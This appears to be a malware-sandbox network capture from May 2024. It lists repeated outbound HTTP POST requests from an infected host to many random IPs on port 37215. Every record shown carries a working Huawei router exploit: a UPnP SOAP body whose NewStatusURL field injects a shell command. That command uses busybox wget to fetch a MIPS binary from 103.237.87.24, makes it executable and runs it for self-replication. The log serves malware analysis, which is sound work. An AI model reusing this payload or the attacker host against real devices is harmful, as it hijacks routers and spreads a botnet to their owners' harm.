                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1893192.168.2.1340486157.111.20.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550523996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1894192.168.2.1352884157.151.136.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550532103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1895192.168.2.1357038157.225.58.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550549030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1896192.168.2.1349842157.234.85.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550580025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1897192.168.2.133970888.225.30.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550580025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1898192.168.2.134910053.81.248.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550630093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1899192.168.2.135520041.80.25.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550632000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1900192.168.2.134780077.57.248.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550725937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1901192.168.2.1358434197.166.21.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550726891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1902192.168.2.1358052197.8.85.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550779104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
